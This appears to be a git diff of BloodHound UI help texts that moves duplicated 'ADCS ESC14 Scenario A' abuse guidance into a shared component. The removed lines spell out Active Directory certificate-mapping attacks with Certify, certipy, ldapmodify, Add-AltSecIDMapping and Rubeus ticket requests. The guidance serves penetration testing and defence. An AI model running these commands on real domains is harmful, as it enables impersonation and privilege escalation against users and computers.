{'certutil.exe -MergePFX .\\cert.pem .\\cert.pfx'} - - The abuse is possible with the strong explicit certificate mappings X509IssuerSerialNumber or - X509SHA1PublicKey. In this example, we use X509SHA1PublicKey. - - - Get the SHA1 hash of the certificate public key using certutil: - - - {`certutil.exe -dump -v .\\cert.pfx -… -Cert Hash(sha1): ef9375785421d3ad286d8bdeb166f0f697266992 -…`} - - - Use Add-AltSecIDMapping to add the explicit certificate mapping string to the - 'altSecurityIdentities' attribute of the target principal: - - - { - 'Add-AltSecIDMapping -DistinguishedName "CN=Target,CN=Users,DC=forestroot,DC=com" -MappingString "X509:ef9375785421d3ad286d8bdeb166f0f697266992"' - } - - - Verify the that the mapping was added using Get-AltSecIDMapping: - - - {'Get-AltSecIDMapping -SearchBase "CN=Target,CN=Users,DC=forestroot,DC=com"'} - - - Use Rubeus to request a ticket granting ticket (TGT) from the domain, specifying the target - identity, and the PFX-formatted certificate: - - - {'Rubeus asktgt /user:"forestroot\\target" /certificate:cert.pfx /ptt'} - - - After the execution of the abuse, use Remove-AltSecIDMapping to remove the explicit certificate - mapping string from the 'altSecurityIdentities' attribute of the target principal: - - - { - 'Remove-AltSecIDMapping -DistinguishedName "CN=Target,CN=Users,DC=forestroot,DC=com" -MappingString "X509:ef9375785421d3ad286d8bdeb166f0f697266992"' - } - + Targeted Kerberoast attack @@ -552,115 +446,7 @@ Cert Hash(sha1): ef9375785421d3ad286d8bdeb166f0f697266992 } - ADCS ESC14 Scenario A - - An attacker can add an explicit certificate mapping in the altSecurityIdentities of the - target referring to a certificate in the attacker's possession, and then use this - certificate to authenticate as the target. - - - The certificate must meet the following requirements: -
    -
  1. Chain up to trusted root CA on the DC
    2. -
  2. Enhanced Key Usage extension contains an EKU that enables domain authentication
    3. -
  3. - Subject Alternative Name (SAN) does NOT contain a "Other Name/Principal Name" entry - (UPN) -
    4. -
-

- The EKUs that enable domain authentication over Kerberos: -

    -
  • Client Authentication (1.3.6.1.5.5.7.3.2)
    • -
  • PKINIT Client Authentication (1.3.6.1.5.2.3.4)
    • -
  • Smart Card Logon (1.3.6.1.4.1.311.20.2.2)
    • -
  • Any Purpose (2.5.29.37.0)
    • -
  • SubCA (no EKUs)
    • -
-

-

- The last certificate requirement means that user certificates will not work, so the - certificate typically must be of a computer. By default, the ADCS certificate template{' '} - Computer (Machine) meets these requirements and grants Domain Computers - enrollment rights. The target can still be a user. -

- The last requirement does not have to be met if a DC has UPN mapping disabled (see{' '} - - How to disable the Subject Alternative Name for UPN mapping - - ). - - - Obtain a certificate meeting the above requirements for example by dumping a certificate - from a computer, or enrolling a new certificate as a computer: - - - { - 'Certify.exe request /ca:rootdomaindc.forestroot.com\\forestroot-RootDomainDC-CA /template:Machine /machine' - } - - - If the enrollment fails with an error message stating that the Email or DNS name is - unavailable and cannot be added to the Subject or Subject Alternate name, then it is because - the enrollee principal does not have their mail or dNSHostName attribute set, which is - required by the certificate template. The mail attribute can be set on both user and - computer objects but the dNSHostName attribute can only be set on computer objects. - Computers have validated write permission to their own dNSHostName attribute by default, but - neither users nor computers can write to their own mail attribute by default. - - - Save the certificate as cert.pem and the private key as cert.key. Use certutil to obtain the - certificate as a PFX file: - - {'certutil.exe -MergePFX .\\cert.pem .\\cert.pfx'} - - The abuse is possible with the strong explicit certificate mappings X509IssuerSerialNumber - or X509SHA1PublicKey. In this example, we use X509SHA1PublicKey. - - - Get the SHA1 hash of the certificate public key using certutil: - - - {`certutil.exe -dump -v .\\cert.pfx -… -Cert Hash(sha1): ef9375785421d3ad286d8bdeb166f0f697266992 -…`} - - - Use Add-AltSecIDMapping to add the explicit certificate mapping string to the - 'altSecurityIdentities' attribute of the target principal: - - - { - 'Add-AltSecIDMapping -DistinguishedName "CN=Target,CN=Users,DC=forestroot,DC=com" -MappingString "X509:ef9375785421d3ad286d8bdeb166f0f697266992"' - } - - - Verify the that the mapping was added using Get-AltSecIDMapping: - - - {'Get-AltSecIDMapping -SearchBase "CN=Target,CN=Users,DC=forestroot,DC=com"'} - - - Use Rubeus to request a ticket granting ticket (TGT) from the domain, specifying the target - identity, and the PFX-formatted certificate: - - - {'Rubeus asktgt /user:"forestroot\\target" /certificate:cert.pfx /ptt'} - - - After the execution of the abuse, use Remove-AltSecIDMapping to remove the explicit - certificate mapping string from the 'altSecurityIdentities' attribute of the target - principal: - - - { - 'Remove-AltSecIDMapping -DistinguishedName "CN=Target,CN=Users,DC=forestroot,DC=com" -MappingString "X509:ef9375785421d3ad286d8bdeb166f0f697266992"' - } - + ); } else { @@ -790,115 +576,7 @@ Cert Hash(sha1): ef9375785421d3ad286d8bdeb166f0f697266992 } - ADCS ESC14 Scenario A - - An attacker can add an explicit certificate mapping in the altSecurityIdentities of the - target referring to a certificate in the attacker's possession, and then use this - certificate to authenticate as the target. - - - The certificate must meet the following requirements: -
    -
  1. Chain up to trusted root CA on the DC
    2. -
  2. Enhanced Key Usage extension contains an EKU that enables domain authentication
    3. -
  3. - Subject Alternative Name (SAN) does NOT contain a "Other Name/Principal Name" entry - (UPN) -
    4. -
-

- The EKUs that enable domain authentication over Kerberos: -

    -
  • Client Authentication (1.3.6.1.5.5.7.3.2)
    • -
  • PKINIT Client Authentication (1.3.6.1.5.2.3.4)
    • -
  • Smart Card Logon (1.3.6.1.4.1.311.20.2.2)
    • -
  • Any Purpose (2.5.29.37.0)
    • -
  • SubCA (no EKUs)
    • -
-

-

- The last certificate requirement means that user certificates will not work, so the - certificate typically must be of a computer. By default, the ADCS certificate template{' '} - Computer (Machine) meets these requirements and grants Domain Computers - enrollment rights. The target can still be a user. -

- The last requirement does not have to be met if a DC has UPN mapping disabled (see{' '} - - How to disable the Subject Alternative Name for UPN mapping - - ). - - - Obtain a certificate meeting the above requirements for example by dumping a certificate - from a computer, or enrolling a new certificate as a computer: - - - { - 'Certify.exe request /ca:rootdomaindc.forestroot.com\\forestroot-RootDomainDC-CA /template:Machine /machine' - } - - - If the enrollment fails with an error message stating that the Email or DNS name is - unavailable and cannot be added to the Subject or Subject Alternate name, then it is because - the enrollee principal does not have their mail or dNSHostName attribute set, which is - required by the certificate template. The mail attribute can be set on both user and - computer objects but the dNSHostName attribute can only be set on computer objects. - Computers have validated write permission to their own dNSHostName attribute by default, but - neither users nor computers can write to their own mail attribute by default. - - - Save the certificate as cert.pem and the private key as cert.key. Use certutil to obtain the - certificate as a PFX file: - - {'certutil.exe -MergePFX .\\cert.pem .\\cert.pfx'} - - The abuse is possible with the strong explicit certificate mappings X509IssuerSerialNumber - or X509SHA1PublicKey. In this example, we use X509SHA1PublicKey. - - - Get the SHA1 hash of the certificate public key using certutil: - - - {`certutil.exe -dump -v .\\cert.pfx -… -Cert Hash(sha1): ef9375785421d3ad286d8bdeb166f0f697266992 -…`} - - - Use Add-AltSecIDMapping to add the explicit certificate mapping string to the - 'altSecurityIdentities' attribute of the target principal: - - - { - 'Add-AltSecIDMapping -DistinguishedName "CN=Target,CN=Users,DC=forestroot,DC=com" -MappingString "X509:ef9375785421d3ad286d8bdeb166f0f697266992"' - } - - - Verify the that the mapping was added using Get-AltSecIDMapping: - - - {'Get-AltSecIDMapping -SearchBase "CN=Target,CN=Users,DC=forestroot,DC=com"'} - - - Use Rubeus to request a ticket granting ticket (TGT) from the domain, specifying the target - identity, and the PFX-formatted certificate: - - - {'Rubeus asktgt /user:"forestroot\\target" /certificate:cert.pfx /ptt'} - - - After the execution of the abuse, use Remove-AltSecIDMapping to remove the explicit - certificate mapping string from the 'altSecurityIdentities' attribute of the target - principal: - - - { - 'Remove-AltSecIDMapping -DistinguishedName "CN=Target,CN=Users,DC=forestroot,DC=com" -MappingString "X509:ef9375785421d3ad286d8bdeb166f0f697266992"' - } - + ); } diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteOwner/LinuxAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteOwner/LinuxAbuse.tsx index 28f6469536b..5a1fc9b51ad 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteOwner/LinuxAbuse.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteOwner/LinuxAbuse.tsx @@ -16,8 +16,8 @@ import { Link, Typography } from '@mui/material'; import { FC } from 'react'; +import { AdcsEsc14ScenarioALinux } from '../AdcsEsc14ScenarioA'; import { EdgeInfoProps } from '../index'; -import CodeController from '../CodeController/CodeController'; const LinuxAbuse: FC = ({ sourceName, targetName, targetType, haslaps }) => { switch (targetType) { @@ -215,104 +215,7 @@ const LinuxAbuse: FC = ({ sourceName, targ For other optional parameters, view the pyWhisker documentation. - ADCS ESC14 Scenario A - - An attacker can add an explicit certificate mapping in the AltSecurityIdentities of the target - referring to a certificate in the attacker's possession, and then use this certificate to - authenticate as the target. - - - The certificate must meet the following requirements: -
    -
  1. Chain up to trusted root CA on the DC
    2. -
  2. Enhanced Key Usage extension contains an EKU that enables domain authentication
    3. -
  3. - Subject Alternative Name (SAN) does NOT contain a "Other Name/Principal Name" entry - (UPN) -
    4. -
-

- The EKUs that enable domain authentication over Kerberos: -

    -
  • Client Authentication (1.3.6.1.5.5.7.3.2)
    • -
  • PKINIT Client Authentication (1.3.6.1.5.2.3.4)
    • -
  • Smart Card Logon (1.3.6.1.4.1.311.20.2.2)
    • -
  • Any Purpose (2.5.29.37.0)
    • -
  • SubCA (no EKUs)
    • -
-

-

- The last certificate requirement means that user certificates will not work, so the - certificate typically must be of a computer. By default, the ADCS certificate template{' '} - Computer (Machine) meets these requirements and grants Domain Computers enrollment - rights. The target can still be a user. -

- The last requirement does not have to be met if a DC has UPN mapping disabled (see{' '} - - How to disable the Subject Alternative Name for UPN mapping - - ). - - - Obtain a certificate meeting the above requirements for example by dumping a certificate from a - computer, or enrolling a new certificate as a computer: - - - {'certipy req -u computername -p Passw0rd -ca corp-DC-CA -target ca.corp.local -template ESC14'} - - - If the enrollment fails with an error message stating that the Email or DNS name is unavailable - and cannot be added to the Subject or Subject Alternate name, then it is because the enrollee - principal does not have their mail or dNSHostName attribute set, which is required by the - certificate template. The mail attribute can be set on both user and computer objects but the - dNSHostName attribute can only be set on computer objects. Computers have validated write - permission to their own dNSHostName attribute by default, but neither users nor computers can - write to their own mail attribute by default. - - - The abuse is possible with the strong explicit certificate mappings X509IssuerSerialNumber or - X509SHA1PublicKey. In this example, we use X509SHA1PublicKey. - - Get the SHA1 hash of the certificate using openssl: - - {`openssl pkcs12 -info -in computername.pfx -nokeys | openssl x509 -noout -sha1 -fingerprint | tr -d ':' | tr '[:upper:]' '[:lower:]' -… -sha1 fingerprint=f61331a504cff8cb5e60c269632c31aa3032a54a`} - - - Use ldapmodify to add the explicit certificate mapping string to the 'altSecurityIdentities' - attribute of the target principal: - - - { - 'echo -e "dn: CN=Target,CN=Users,DC=forestroot,DC=com\nchangetype: modify\nadd: altSecurityIdentities\naltSecurityIdentities: X509:f61331a504cff8cb5e60c269632c31aa3032a54a" | ldapmodify -x -D "CN=Attacker,CN=Users,DC=forestroot,DC=com" -w \'PWD\' -h forestroot.com' - } - - Verify the that the mapping was added using ldapsearch: - - { - 'ldapsearch -x -D "CN=Attacker,CN=Users,DC=forestroot,DC=com" -w \'PWD\' -h "forestroot.com" -b "CN=Target,CN=Users,DC=forestroot,DC=com" altSecurityIdentities' - } - - - Request a ticket granting ticket (TGT) from the domain using Certipy, specifying the certificate - and the IP of a DC: - - - {'certipy auth -pfx computername.pfx -dc-ip 172.16.126.128'} - - - After the execution of the abuse, use ldapmodify to remove the explicit certificate mapping - string from the ‘altSecurityIdentities’ attribute of the target principal: - - - { - 'echo -e "dn: CN=Target,CN=Users,DC=forestroot,DC=com\nchangetype: modify\ndelete: altSecurityIdentities\naltSecurityIdentities: X509:f61331a504cff8cb5e60c269632c31aa3032a54a" | ldapmodify -x -D "CN=Attacker,CN=Users,DC=forestroot,DC=com" -w \'PWD\' -h forestroot.com' - } - + ); case 'Computer': @@ -438,106 +341,7 @@ sha1 fingerprint=f61331a504cff8cb5e60c269632c31aa3032a54a`} For other optional parameters, view the pyWhisker documentation. - ADCS ESC14 Scenario A - - An attacker can add an explicit certificate mapping in the AltSecurityIdentities of the - target referring to a certificate in the attacker's possession, and then use this - certificate to authenticate as the target. - - - The certificate must meet the following requirements: -
    -
  1. Chain up to trusted root CA on the DC
    2. -
  2. Enhanced Key Usage extension contains an EKU that enables domain authentication
    3. -
  3. - Subject Alternative Name (SAN) does NOT contain a "Other Name/Principal Name" entry - (UPN) -
    4. -
-

- The EKUs that enable domain authentication over Kerberos: -

    -
  • Client Authentication (1.3.6.1.5.5.7.3.2)
    • -
  • PKINIT Client Authentication (1.3.6.1.5.2.3.4)
    • -
  • Smart Card Logon (1.3.6.1.4.1.311.20.2.2)
    • -
  • Any Purpose (2.5.29.37.0)
    • -
  • SubCA (no EKUs)
    • -
-

-

- The last certificate requirement means that user certificates will not work, so the - certificate typically must be of a computer. By default, the ADCS certificate template{' '} - Computer (Machine) meets these requirements and grants Domain Computers - enrollment rights. The target can still be a user. -

- The last requirement does not have to be met if a DC has UPN mapping disabled (see{' '} - - How to disable the Subject Alternative Name for UPN mapping - - ). - - - Obtain a certificate meeting the above requirements for example by dumping a certificate - from a computer, or enrolling a new certificate as a computer: - - - { - 'certipy req -u computername -p Passw0rd -ca corp-DC-CA -target ca.corp.local -template ESC14' - } - - - If the enrollment fails with an error message stating that the Email or DNS name is - unavailable and cannot be added to the Subject or Subject Alternate name, then it is because - the enrollee principal does not have their mail or dNSHostName attribute set, which is - required by the certificate template. The mail attribute can be set on both user and - computer objects but the dNSHostName attribute can only be set on computer objects. - Computers have validated write permission to their own dNSHostName attribute by default, but - neither users nor computers can write to their own mail attribute by default. - - - The abuse is possible with the strong explicit certificate mappings X509IssuerSerialNumber - or X509SHA1PublicKey. In this example, we use X509SHA1PublicKey. - - Get the SHA1 hash of the certificate using openssl: - - {`openssl pkcs12 -info -in computername.pfx -nokeys | openssl x509 -noout -sha1 -fingerprint | tr -d ':' | tr '[:upper:]' '[:lower:]' -… -sha1 fingerprint=f61331a504cff8cb5e60c269632c31aa3032a54a`} - - - Use ldapmodify to add the explicit certificate mapping string to the 'altSecurityIdentities' - attribute of the target principal: - - - { - 'echo -e "dn: CN=Target,CN=Users,DC=forestroot,DC=com\nchangetype: modify\nadd: altSecurityIdentities\naltSecurityIdentities: X509:f61331a504cff8cb5e60c269632c31aa3032a54a" | ldapmodify -x -D "CN=Attacker,CN=Users,DC=forestroot,DC=com" -w \'PWD\' -h forestroot.com' - } - - Verify the that the mapping was added using ldapsearch: - - { - 'ldapsearch -x -D "CN=Attacker,CN=Users,DC=forestroot,DC=com" -w \'PWD\' -h "forestroot.com" -b "CN=Target,CN=Users,DC=forestroot,DC=com" altSecurityIdentities' - } - - - Request a ticket granting ticket (TGT) from the domain using Certipy, specifying the - certificate and the IP of a DC: - - - {'certipy auth -pfx computername.pfx -dc-ip 172.16.126.128'} - - - After the execution of the abuse, use ldapmodify to remove the explicit certificate mapping - string from the ‘altSecurityIdentities’ attribute of the target principal: - - - { - 'echo -e "dn: CN=Target,CN=Users,DC=forestroot,DC=com\nchangetype: modify\ndelete: altSecurityIdentities\naltSecurityIdentities: X509:f61331a504cff8cb5e60c269632c31aa3032a54a" | ldapmodify -x -D "CN=Attacker,CN=Users,DC=forestroot,DC=com" -w \'PWD\' -h forestroot.com' - } - + ); } else { @@ -619,106 +423,7 @@ sha1 fingerprint=f61331a504cff8cb5e60c269632c31aa3032a54a`} For other optional parameters, view the pyWhisker documentation. - ADCS ESC14 Scenario A - - An attacker can add an explicit certificate mapping in the AltSecurityIdentities of the - target referring to a certificate in the attacker's possession, and then use this - certificate to authenticate as the target. - - - The certificate must meet the following requirements: -
    -
  1. Chain up to trusted root CA on the DC
    2. -
  2. Enhanced Key Usage extension contains an EKU that enables domain authentication
    3. -
  3. - Subject Alternative Name (SAN) does NOT contain a "Other Name/Principal Name" entry - (UPN) -
    4. -
-

- The EKUs that enable domain authentication over Kerberos: -

    -
  • Client Authentication (1.3.6.1.5.5.7.3.2)
    • -
  • PKINIT Client Authentication (1.3.6.1.5.2.3.4)
    • -
  • Smart Card Logon (1.3.6.1.4.1.311.20.2.2)
    • -
  • Any Purpose (2.5.29.37.0)
    • -
  • SubCA (no EKUs)
    • -
-

-

- The last certificate requirement means that user certificates will not work, so the - certificate typically must be of a computer. By default, the ADCS certificate template{' '} - Computer (Machine) meets these requirements and grants Domain Computers - enrollment rights. The target can still be a user. -

- The last requirement does not have to be met if a DC has UPN mapping disabled (see{' '} - - How to disable the Subject Alternative Name for UPN mapping - - ). - - - Obtain a certificate meeting the above requirements for example by dumping a certificate - from a computer, or enrolling a new certificate as a computer: - - - { - 'certipy req -u computername -p Passw0rd -ca corp-DC-CA -target ca.corp.local -template ESC14' - } - - - If the enrollment fails with an error message stating that the Email or DNS name is - unavailable and cannot be added to the Subject or Subject Alternate name, then it is because - the enrollee principal does not have their mail or dNSHostName attribute set, which is - required by the certificate template. The mail attribute can be set on both user and - computer objects but the dNSHostName attribute can only be set on computer objects. - Computers have validated write permission to their own dNSHostName attribute by default, but - neither users nor computers can write to their own mail attribute by default. - - - The abuse is possible with the strong explicit certificate mappings X509IssuerSerialNumber - or X509SHA1PublicKey. In this example, we use X509SHA1PublicKey. - - Get the SHA1 hash of the certificate using openssl: - - {`openssl pkcs12 -info -in computername.pfx -nokeys | openssl x509 -noout -sha1 -fingerprint | tr -d ':' | tr '[:upper:]' '[:lower:]' -… -sha1 fingerprint=f61331a504cff8cb5e60c269632c31aa3032a54a`} - - - Use ldapmodify to add the explicit certificate mapping string to the 'altSecurityIdentities' - attribute of the target principal: - - - { - 'echo -e "dn: CN=Target,CN=Users,DC=forestroot,DC=com\nchangetype: modify\nadd: altSecurityIdentities\naltSecurityIdentities: X509:f61331a504cff8cb5e60c269632c31aa3032a54a" | ldapmodify -x -D "CN=Attacker,CN=Users,DC=forestroot,DC=com" -w \'PWD\' -h forestroot.com' - } - - Verify the that the mapping was added using ldapsearch: - - { - 'ldapsearch -x -D "CN=Attacker,CN=Users,DC=forestroot,DC=com" -w \'PWD\' -h "forestroot.com" -b "CN=Target,CN=Users,DC=forestroot,DC=com" altSecurityIdentities' - } - - - Request a ticket granting ticket (TGT) from the domain using Certipy, specifying the - certificate and the IP of a DC: - - - {'certipy auth -pfx computername.pfx -dc-ip 172.16.126.128'} - - - After the execution of the abuse, use ldapmodify to remove the explicit certificate mapping - string from the ‘altSecurityIdentities’ attribute of the target principal: - - - { - 'echo -e "dn: CN=Target,CN=Users,DC=forestroot,DC=com\nchangetype: modify\ndelete: altSecurityIdentities\naltSecurityIdentities: X509:f61331a504cff8cb5e60c269632c31aa3032a54a" | ldapmodify -x -D "CN=Attacker,CN=Users,DC=forestroot,DC=com" -w \'PWD\' -h forestroot.com' - } - + ); } diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteOwner/WindowsAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteOwner/WindowsAbuse.tsx index 4f898268b8e..f8cb4aecdb7 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteOwner/WindowsAbuse.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WriteOwner/WindowsAbuse.tsx @@ -16,6 +16,7 @@ import { Link, Typography } from '@mui/material'; import { FC } from 'react'; +import { AdcsEsc14ScenarioAWindows } from '../AdcsEsc14ScenarioA'; import CodeController from '../CodeController/CodeController'; import { EdgeInfoProps } from '../index'; @@ -271,114 +272,7 @@ const WindowsAbuse: FC = For other optional parameters, view the Whisker documentation. - ADCS ESC14 Scenario A - - An attacker can add an explicit certificate mapping in the altSecurityIdentities of the target - referring to a certificate in the attacker's possession, and then use this certificate to - authenticate as the target. - - - The certificate must meet the following requirements: -
    -
  1. Chain up to trusted root CA on the DC
    2. -
  2. Enhanced Key Usage extension contains an EKU that enables domain authentication
    3. -
  3. - Subject Alternative Name (SAN) does NOT contain a "Other Name/Principal Name" entry - (UPN) -
    4. -
-

- The EKUs that enable domain authentication over Kerberos: -

    -
  • Client Authentication (1.3.6.1.5.5.7.3.2)
    • -
  • PKINIT Client Authentication (1.3.6.1.5.2.3.4)
    • -
  • Smart Card Logon (1.3.6.1.4.1.311.20.2.2)
    • -
  • Any Purpose (2.5.29.37.0)
    • -
  • SubCA (no EKUs)
    • -
-

-

- The last certificate requirement means that user certificates will not work, so the - certificate typically must be of a computer. By default, the ADCS certificate template{' '} - Computer (Machine) meets these requirements and grants Domain Computers enrollment - rights. The target can still be a user. -

- The last requirement does not have to be met if a DC has UPN mapping disabled (see{' '} - - How to disable the Subject Alternative Name for UPN mapping - - ). - - - Obtain a certificate meeting the above requirements for example by dumping a certificate from a - computer, or enrolling a new certificate as a computer: - - - { - 'Certify.exe request /ca:rootdomaindc.forestroot.com\\forestroot-RootDomainDC-CA /template:Machine /machine' - } - - - If the enrollment fails with an error message stating that the Email or DNS name is unavailable - and cannot be added to the Subject or Subject Alternate name, then it is because the enrollee - principal does not have their mail or dNSHostName attribute set, which is required by the - certificate template. The mail attribute can be set on both user and computer objects but the - dNSHostName attribute can only be set on computer objects. Computers have validated write - permission to their own dNSHostName attribute by default, but neither users nor computers can - write to their own mail attribute by default. - - - Save the certificate as cert.pem and the private key as cert.key. Use certutil to obtain the - certificate as a PFX file: - - {'certutil.exe -MergePFX .\\cert.pem .\\cert.pfx'} - - The abuse is possible with the strong explicit certificate mappings X509IssuerSerialNumber or - X509SHA1PublicKey. In this example, we use X509SHA1PublicKey. - - - Get the SHA1 hash of the certificate public key using certutil: - - - {`certutil.exe -dump -v .\\cert.pfx -… -Cert Hash(sha1): ef9375785421d3ad286d8bdeb166f0f697266992 -…`} - - - Use Add-AltSecIDMapping to add the explicit certificate mapping string to the - 'altSecurityIdentities' attribute of the target principal: - - - { - 'Add-AltSecIDMapping -DistinguishedName "CN=Target,CN=Users,DC=forestroot,DC=com" -MappingString "X509:ef9375785421d3ad286d8bdeb166f0f697266992"' - } - - - Verify the that the mapping was added using Get-AltSecIDMapping: - - - {'Get-AltSecIDMapping -SearchBase "CN=Target,CN=Users,DC=forestroot,DC=com"'} - - - Use Rubeus to request a ticket granting ticket (TGT) from the domain, specifying the target - identity, and the PFX-formatted certificate: - - - {'Rubeus asktgt /user:"forestroot\\target" /certificate:cert.pfx /ptt'} - - - After the execution of the abuse, use Remove-AltSecIDMapping to remove the explicit certificate - mapping string from the 'altSecurityIdentities' attribute of the target principal: - - - { - 'Remove-AltSecIDMapping -DistinguishedName "CN=Target,CN=Users,DC=forestroot,DC=com" -MappingString "X509:ef9375785421d3ad286d8bdeb166f0f697266992"' - } - + Targeted Kerberoast attack @@ -625,6 +519,8 @@ Cert Hash(sha1): ef9375785421d3ad286d8bdeb166f0f697266992 'Rubeus.exe s4u /user:attackersystem$ /rc4:EF266C6B963C0BB683941032008AD47F /impersonateuser:admin /msdsspn:cifs/TARGETCOMPUTER.testlab.local /ptt' } + + ); } else { @@ -778,115 +674,7 @@ Cert Hash(sha1): ef9375785421d3ad286d8bdeb166f0f697266992 } - ADCS ESC14 Scenario A - - An attacker can add an explicit certificate mapping in the altSecurityIdentities of the - target referring to a certificate in the attacker's possession, and then use this - certificate to authenticate as the target. - - - The certificate must meet the following requirements: -
    -
  1. Chain up to trusted root CA on the DC
    2. -
  2. Enhanced Key Usage extension contains an EKU that enables domain authentication
    3. -
  3. - Subject Alternative Name (SAN) does NOT contain a "Other Name/Principal Name" entry - (UPN) -
    4. -
-

- The EKUs that enable domain authentication over Kerberos: -

    -
  • Client Authentication (1.3.6.1.5.5.7.3.2)
    • -
  • PKINIT Client Authentication (1.3.6.1.5.2.3.4)
    • -
  • Smart Card Logon (1.3.6.1.4.1.311.20.2.2)
    • -
  • Any Purpose (2.5.29.37.0)
    • -
  • SubCA (no EKUs)
    • -
-

-

- The last certificate requirement means that user certificates will not work, so the - certificate typically must be of a computer. By default, the ADCS certificate template{' '} - Computer (Machine) meets these requirements and grants Domain Computers - enrollment rights. The target can still be a user. -

- The last requirement does not have to be met if a DC has UPN mapping disabled (see{' '} - - How to disable the Subject Alternative Name for UPN mapping - - ). - - - Obtain a certificate meeting the above requirements for example by dumping a certificate - from a computer, or enrolling a new certificate as a computer: - - - { - 'Certify.exe request /ca:rootdomaindc.forestroot.com\\forestroot-RootDomainDC-CA /template:Machine /machine' - } - - - If the enrollment fails with an error message stating that the Email or DNS name is - unavailable and cannot be added to the Subject or Subject Alternate name, then it is because - the enrollee principal does not have their mail or dNSHostName attribute set, which is - required by the certificate template. The mail attribute can be set on both user and - computer objects but the dNSHostName attribute can only be set on computer objects. - Computers have validated write permission to their own dNSHostName attribute by default, but - neither users nor computers can write to their own mail attribute by default. - - - Save the certificate as cert.pem and the private key as cert.key. Use certutil to obtain the - certificate as a PFX file: - - {'certutil.exe -MergePFX .\\cert.pem .\\cert.pfx'} - - The abuse is possible with the strong explicit certificate mappings X509IssuerSerialNumber - or X509SHA1PublicKey. In this example, we use X509SHA1PublicKey. - - - Get the SHA1 hash of the certificate public key using certutil: - - - {`certutil.exe -dump -v .\\cert.pfx -… -Cert Hash(sha1): ef9375785421d3ad286d8bdeb166f0f697266992 -…`} - - - Use Add-AltSecIDMapping to add the explicit certificate mapping string to the - 'altSecurityIdentities' attribute of the target principal: - - - { - 'Add-AltSecIDMapping -DistinguishedName "CN=Target,CN=Users,DC=forestroot,DC=com" -MappingString "X509:ef9375785421d3ad286d8bdeb166f0f697266992"' - } - - - Verify the that the mapping was added using Get-AltSecIDMapping: - - - {'Get-AltSecIDMapping -SearchBase "CN=Target,CN=Users,DC=forestroot,DC=com"'} - - - Use Rubeus to request a ticket granting ticket (TGT) from the domain, specifying the target - identity, and the PFX-formatted certificate: - - - {'Rubeus asktgt /user:"forestroot\\target" /certificate:cert.pfx /ptt'} - - - After the execution of the abuse, use Remove-AltSecIDMapping to remove the explicit - certificate mapping string from the 'altSecurityIdentities' attribute of the target - principal: - - - { - 'Remove-AltSecIDMapping -DistinguishedName "CN=Target,CN=Users,DC=forestroot,DC=com" -MappingString "X509:ef9375785421d3ad286d8bdeb166f0f697266992"' - } - + ); } diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WritePublicInformation/General.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WritePublicInformation/General.tsx index 617f2107260..daa451630d1 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WritePublicInformation/General.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WritePublicInformation/General.tsx @@ -28,9 +28,10 @@ const General: FC = ({ sourceName, sourceType, targetName, target - The Public-Information property set includes the altSecurityIdentities attribute, which allow you to - specify explicit certificate mappings for a principal. An explicit certificate mapping is a - reference to a certificate, which can be used to authenticate as the principal. + The altSecurityIdentities attribute allows you to specify explicit certificate mappings for a + principal. An explicit certificate mapping directly links a specific certificate to the principal, as an + alternative to the normal certificate-to-account mapping rules and allowing authentication as that + principal. diff --git a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WritePublicInformation/LinuxAbuse.tsx b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WritePublicInformation/LinuxAbuse.tsx index cd9d6d9492a..222ddc42429 100644 --- a/packages/javascript/bh-shared-ui/src/components/HelpTexts/WritePublicInformation/LinuxAbuse.tsx +++ b/packages/javascript/bh-shared-ui/src/components/HelpTexts/WritePublicInformation/LinuxAbuse.tsx @@ -16,7 +16,7 @@ import { Link, Typography } from '@mui/material'; import { FC } from 'react'; -import CodeController from '../CodeController/CodeController'; +import { AdcsEsc14ScenarioALinux } from '../AdcsEsc14ScenarioA'; import { EdgeInfoProps } from '../index'; const LinuxAbuse: FC = () => { @@ -33,102 +33,7 @@ const LinuxAbuse: FC = () => { {' '} edge for more details. - - An attacker can add an explicit certificate mapping in the AltSecurityIdentities of the target referring - to a certificate in the attacker's possession, and then use this certificate to authenticate as the - target. - - - The certificate must meet the following requirements: -
    -
  1. Chain up to trusted root CA on the DC
    2. -
  2. Enhanced Key Usage extension contains an EKU that enables domain authentication
    3. -
  3. Subject Alternative Name (SAN) does NOT contain a "Other Name/Principal Name" entry (UPN)
    4. -
-

- The EKUs that enable domain authentication over Kerberos: -

    -
  • Client Authentication (1.3.6.1.5.5.7.3.2)
    • -
  • PKINIT Client Authentication (1.3.6.1.5.2.3.4)
    • -
  • Smart Card Logon (1.3.6.1.4.1.311.20.2.2)
    • -
  • Any Purpose (2.5.29.37.0)
    • -
  • SubCA (no EKUs)
    • -
-

-

- The last certificate requirement means that user certificates will not work, so the certificate - typically must be of a computer. By default, the ADCS certificate template Computer (Machine){' '} - meets these requirements and grants Domain Computers enrollment rights. The target can still be a - user. -

- The last requirement does not have to be met if a DC has UPN mapping disabled (see{' '} - - How to disable the Subject Alternative Name for UPN mapping - - ). - - Step 1: Obtain certificate - - Obtain a certificate meeting the above requirements for example by dumping a certificate from a - computer, or enrolling a new certificate as a computer: - - - {'certipy req -u computername -p Passw0rd -ca corp-DC-CA -target ca.corp.local -template ESC14'} - - - If the enrollment fails with an error message stating that the Email or DNS name is unavailable and - cannot be added to the Subject or Subject Alternate name, then it is because the enrollee principal does - not have their mail or dNSHostName attribute set, which is required by the certificate template. The - mail attribute can be set on both user and computer objects but the dNSHostName attribute can only be - set on computer objects. Computers have validated write permission to their own dNSHostName attribute by - default, but neither users nor computers can write to their own mail attribute by default. - - Step 2: Get certificate mapping identifier - - The abuse is possible with the strong explicit certificate mappings X509IssuerSerialNumber or - X509SHA1PublicKey. In this example, we use X509SHA1PublicKey. - - Get the SHA1 hash of the certificate using openssl: - - {`openssl pkcs12 -info -in computername.pfx -nokeys | 